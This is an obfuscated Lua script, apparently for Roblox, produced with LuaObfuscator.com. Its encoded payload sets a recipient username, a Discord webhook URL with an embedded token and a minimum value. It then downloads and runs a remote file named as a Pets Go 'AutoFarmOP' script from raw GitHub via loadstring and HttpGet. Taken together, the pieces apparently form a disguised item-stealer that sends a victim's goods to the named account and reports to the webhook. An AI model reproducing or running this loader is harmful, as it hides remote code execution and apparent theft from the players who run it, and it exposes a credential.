--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v127=0;local v128;while true do if (v127==1) then return v128;end if (v127==0) then v128=v5(v87,v19);v19=nil;v127=1;end end else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((879 -(282 + 595)) -1)) -(v32-(620 -(555 + 64)))) + (932 -((2494 -(1523 + 114)) + 67 + 7)))) ;return v88-(v88%1) ;else local v89=568 -(367 + 201) ;local v90;while true do if (v89==(927 -(214 + 713))) then v90=(1 + 1)^(v32-1) ;return (((v31%(v90 + v90))>=v90) and 1) or ((0 -0) + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -((58 -26) + 85)) );v18=v18 + 4 + 0 ;return (v40 * (3720433 + 13056783)) + (v39 * (66493 -(892 + 65))) + (v38 * (610 -354)) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==1) then v44=(1774 -(630 + 793)) -(87 + 263) ;v45=(v20(v43,181 -(67 + 113) ,76 -(189 -133) ) * ((2 + 0)^(78 -46))) + v42 ;v41=6 -4 ;end if (v41==(3 + 0)) then if (v46==(0 -0)) then if (v45==0) then return v47 * (0 -0) ;else v46=431 -(44 + (1827 -1441)) ;v44=(375 + 577) -(802 + 150) ;end elseif (v46==(5511 -3464)) then return ((v45==(0 + 0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(2020 -(915 + 82)) ) * (v44 + (v45/((8 -6)^(31 + 21)))) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1 + 0 ;end if (v41==((6 -4) -0)) then v46=v20(v43,1208 -(1069 + 118) ,70 -39 );v47=((v20(v43,69 -(1784 -(760 + 987)) )==(1 + 0)) and  -((1914 -(1789 + 124)) -0)) or (1 -0) ;v41=3 + 0 ;end end end local function v25(v48) local v49;if  not v48 then local v91=766 -(585 + 160 + 21) ;while true do if (v91==(0 + 0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v67=1 + (1055 -(87 + 968)) , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if (v92~=0) then else local v122=(function() return 0 -0 ;end)();local v123=(function() return;end)();while true do if (v122~=0) then else v123=(function() return 1700 -(1419 + 281) ;end)();while true do if (v123~=(1 -0)) then else v92=(function() return  #"]";end)();break;end if (v123~=(74 -(71 + 3))) then else v93=(function() return v94();end)();v95=(function() return nil;end)();v123=(function() return 1 + 0 ;end)();end end break;end end end if (v92~= #"[") then else if (v93== #"{") then v95=(function() return v94()~=0 ;end)();elseif (v93==(4 -2)) then v95=(function() return v96();end)();elseif (v93~= #"19(") then else v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v52=(function() return function(v100,v101,v102,v103,v104,v105,v106,v107,v108) local v109=(function() return 0 -0 ;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do if ((241 -(187 + 54))==v109) then local v125=(function() return 780 -(162 + 618) ;end)();while true do if (v125~=0) then else v100=(function() return 0 + 0 ;end)();v101=(function() return nil;end)();v125=(function() return 1 + 0 ;end)();end if (v125==(1 -0)) then v109=(function() return 1 -0 ;end)();break;end end end if (v109==1) then local v126=(function() return 0;end)();while true do if (v126==(0 + 0)) then local v129=(function() return 0;end)();while true do if (v129==(1636 -(1373 + 263))) then while true do if (v100~=0) then else v101=(function() return v102();end)();if (v103(v101, #",", #":")==(1000 -(451 + 549))) then local v181=(function() return 0;end)();local v182=(function() return;end)();local v183=(function() return;end)();local v184=(function() return;end)();while true do if (2==v181) then if (v103(v183, #"|", #":")~= #" ") then else v184[1 + 1 ]=(function() return v106[v184[2 -0 ]];end)();end if (v103(v183,2,2 -0 )~= #">") then else v184[ #"91("]=(function() return v106[v184[ #"91("]];end)();end v181=(function() return 1387 -(746 + 638) ;end)();end if (v181~=1) then else local v185=(function() return 0;end)();while true do if (v185~=(0 + 0)) then else v184=(function() return {v104(),v104(),nil,nil};end)();if (v182==0) then local v192=(function() return 0;end)();local v193=(function() return;end)();while true do if (v192==0) then v193=(function() return 341 -(218 + 123) ;end)();while true do if (v193==(1581 -(1535 + 46))) then v184[ #"91("]=(function() return v104();end)();v184[ #".dev"]=(function() return v104();end)();break;end end break;end end elseif (v182== #"]") then v184[ #"asd"]=(function() return v105();end)();elseif (v182==2) then v184[ #"asd"]=(function() return v105() -(2^(16 + 0)) ;end)();elseif (v182~= #"19(") then else local v198=(function() return 0;end)();while true do if (v198~=(0 + 0)) then else v184[ #"nil"]=(function() return v105() -(2^16) ;end)();v184[ #"0313"]=(function() return v104();end)();break;end end end v185=(function() return 561 -(306 + 254) ;end)();end if (v185==(1 + 0)) then v181=(function() return 2;end)();break;end end end if (v181==(0 -0)) then local v186=(function() return 1467 -(899 + 568) ;end)();while true do if ((1 + 0)==v186) then v181=(function() return 1;end)();break;end if (0==v186) then local v191=(function() return 0 -0 ;end)();while true do if (v191==1) then v186=(function() return 604 -(268 + 335) ;end)();break;end if (0==v191) then v182=(function() return v103(v101,292 -(60 + 230) , #"-19");end)();v183=(function() return v103(v101, #"xnxx",6);end)();v191=(function() return 573 -(426 + 146) ;end)();end end end end end if ((1 + 2)==v181) then if (v103(v183, #"19(", #"nil")== #"}") then v184[ #"xnxx"]=(function() return v106[v184[ #"asd1"]];end)();end v107[v108]=(function() return v184;end)();break;end end end break;end end return v100,v101,v102,v103,v104,v105,v106,v107,v108;end end end end end end end;end)();local v53=(function() return function(v110,v111,v112) local v113=(function() return 0;end)();local v114=(function() return;end)();while true do if (v113~=0) then else v114=(function() return 0;end)();while true do if (v114~=0) then else local v130=(function() return 0;end)();while true do if (v130==(1456 -(282 + 1174))) then local v158=(function() return 0;end)();while true do if (v158==0) then v110[v111-#"\\" ]=(function() return v112();end)();return v110,v111,v112;end end end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #".",v58 do FlatIdent_25011,Type,v21,Cons,v24,v25,v59,v69=(function() return v51(FlatIdent_25011,Type,v21,Cons,v24,v25,v59,v69);end)();end v57[ #"xxx"]=(function() return v21();end)();for v70= #"<",v23() do FlatIdent_1076E,Descriptor,v21,v20,v22,v23,v59,v54,v70=(function() return v52(FlatIdent_1076E,Descriptor,v21,v20,v22,v23,v59,v54,v70);end)();end for v71= #".",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[812 -(569 + 242) ];local v65=v61[5 -3 ];local v66=v61[1 + 2 ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=1025 -((961 -255) + 318) ;local v77= -(739 -(506 + 36 + 196));local v78={};local v79={...};local v80=v12("#",...) -(1272 -(945 + 326)) ;local v81={};local v82={};for v115=0 -0 ,v80 do if (v115>=v74) then v78[v115-v74 ]=v79[v115 + 1 + 0 ];else v82[v115]=v79[v115 + (2 -1) ];end end local v83=(v80-v74) + (701 -(271 + (739 -310))) ;local v84;local v85;while true do v84=v72[v76];v85=v84[1 + 0 ];if ((v85<=(1508 -(1408 + (277 -185)))) or (2408<2109)) then if ((v85<=(1089 -(461 + (929 -(244 + 60))))) or (33==1455)) then if (v85<=(1122 -(118 + 1003))) then if ((v85==(0 -(0 + 0))) or (443>=4015)) then v82[v84[(1766 -(41 + 435)) -(993 + 295) ]]=v63[v84[1 + (1003 -(938 + 63)) ]];else local v133=v84[1173 -(322 + 96 + (1878 -(936 + 189))) ];local v134=v82[v84[2 + 1 ]];v82[v133 + 1 + 0 ]=v134;v82[v133]=v134[v84[4 + 0 ]];end elseif (v85==2) then v82[v84[1 + 1 ]]=v84[1 + 2 ];else local v140=0;local v141;local v142;while true do if (v140==(529 -(406 + 123))) then v141=v84[1771 -(576 + 1173 + 20) ];v142=v82[v84[1 + 2 ]];v140=1323 -(1249 + 73) ;end if (v140==(1 + 0)) then v82[v141 + (1146 -(466 + 679)) ]=v142;v82[v141]=v142[v84[8 -4 ]];break;end end end elseif (v85<=(11 -6)) then if (v85==(11 -7)) then v82[v84[1902 -(106 + 1794) ]]();else v82[v84[1 + 1 ]][v84[1 + 2 ]]=v84[11 -7 ];end elseif ((3382>166) and (v85<=(16 -10))) then do return;end elseif ((v85==(121 -(4 + 110))) or (280==3059)) then v82[v84[586 -(57 + 527) ]]();else v82[v84[2 + 0 ]]=v84[2 + 1 ]~=(1427 -(41 + 1386)) ;end elseif (v85<=(115 -((1630 -(1565 + 48)) + 86))) then if (v85<=(7 + 3)) then if (v85==((704 + 435) -(369 + 761))) then v82[v84[3 -(1139 -(782 + 356)) ]]=v63[v84[8 -5 ]];else v82[v84[(269 -(176 + 91)) + 0 ]]=v84[169 -(122 + 44) ]~=((0 -0) -0) ;end elseif (v85>(36 -(36 -11))) then v82[v84[2 + 0 ]]=v84[1 + 2 ];else v82[v84[3 -1 ]][v84[68 -(30 + 35) ]]=v84[3 + (1093 -(975 + 117)) ];end elseif ((1881>1293) and (v85<=14)) then if (v85>13) then local v152=v84[2];local v153,v154=v75(v82[v152](v13(v82,v152 + (337 -(144 + 192)) ,v84[3])));v77=(v154 + v152) -(1258 -(1043 + 214)) ;local v155=(1875 -(157 + 1718)) -0 ;for v159=v152,v77 do local v160=0 + 0 ;while true do if ((2357==2357) and (v160==(1212 -(323 + 889)))) then v155=v155 + (2 -1) ;v82[v159]=v153[v155];break;end end end else do return;end end elseif (v85<=(1519 -(295 + 68 + 1141))) then local v156=v84[1582 -(1183 + 397) ];v82[v156]=v82[v156](v13(v82,v156 + ((2062 -1481) -(361 + (748 -529))) ,v77));elseif ((123==123) and (v85==(48 -32))) then local v162=320 -(53 + 267) ;local v163;while true do if ((v162==(0 + 0)) or (1056>=3392)) then v163=v84[415 -(15 + 398) ];v82[v163]=v82[v163](v13(v82,v163 + (983 -(18 + (1982 -(697 + 321)))) ,v77));break;end end else local v164=v84[7 -5 ];local v165,v166=v75(v82[v164](v13(v82,v164 + 1 + 0 ,v84[(5 -3) + 1 ])));v77=(v166 + v164) -(1934 -(565 + 1368)) ;local v167=0 -0 ;for v173=v164,v77 do v167=v167 + (851 -(20 + 830)) ;v82[v173]=v165[v167];end end v76=v76 + (1662 -(1477 + 184)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3Q0003023Q005F4703043Q005573657203093Q006461766974616C743103073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313035322Q38343735333032353631373936302F5F72475A4857794C724C426E765A53702Q6F6C752Q7A6E4B7251315A613849374E63494A544957517A4D4168734F374A6D5141743358737464545A4C6D57496D775F785A2Q033Q004D696E024Q00D0126341030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657473474F2F726566732F68656164732F6D61696E2F4175746F4661726D4F502E6C7561000F3Q0012093Q00013Q00300B3Q000200030012093Q00013Q00300B3Q000400050012093Q00013Q00300B3Q000600070012093Q00083Q001209000100093Q00200100010001000A00120C0003000B4Q0008000400014Q0011000100044Q00105Q00022Q00043Q000100012Q00063Q00017Q00",v9(),...);
